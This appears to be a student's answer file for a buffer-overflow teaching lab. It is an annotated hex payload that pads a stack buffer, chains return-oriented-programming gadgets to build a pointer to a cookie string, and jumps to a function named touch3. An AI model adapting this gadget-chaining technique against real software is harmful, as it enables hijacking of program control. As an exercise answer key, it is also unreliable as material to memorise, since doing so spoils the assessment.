00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 /* first 40 bytes as padding string */
06 1a 40 00 00 00 00 00 /* 48 89 e0 c3 # movq %rsp, %rax; retq; address: 0x401a06 */
a2 19 40 00 00 00 00 00 /* 48 89 c7 c3 # movq %rax, %rdi; retq; address: 0x4019a2 <--- This value of %rsp goes %rax */
ab 19 40 00 00 00 00 00 /* 58 90 c3 # pop %rax; retq; address: 0x4019ab */
48 00 00 00 00 00 00 00 /* offset value: 9*8=72 ,so in hex 0x48 */
42 1a 40 00 00 00 00 00 /* 89 c2 84 c0 c3# movl %eax, %edx;testb %al, %al;retq address: 0x401a42 */
69 1a 40 00 00 00 00 00 /* 89 d1 08 db c3 # movl %edx, %ecx;orb %bl, %bl;retq address: 0x401a69 */
27 1a 40 00 00 00 00 00 /* 89 ce 38 c0 c3 # movl %ecx, %esi;cmpb %al, %al;retq address: 0x401a27 */
d6 19 40 00 00 00 00 00 /* 48 8d 04 37 c3 # lea    (%rdi,%rsi,1),%rax; retq address: 0x4019d6 */
a2 19 40 00 00 00 00 00 /* 48 89 c7 c3 # movq %rax, %rdi; retq; address: 0x4019a2 */
fa 18 40 00 00 00 00 00 /* address touch3 0x4018fa */
35 39 62 39 39 37 66 61 /* String representation of cookie 0x59b997fa*/
00 00 00 00 00 00 00 00 /* null terminating string */
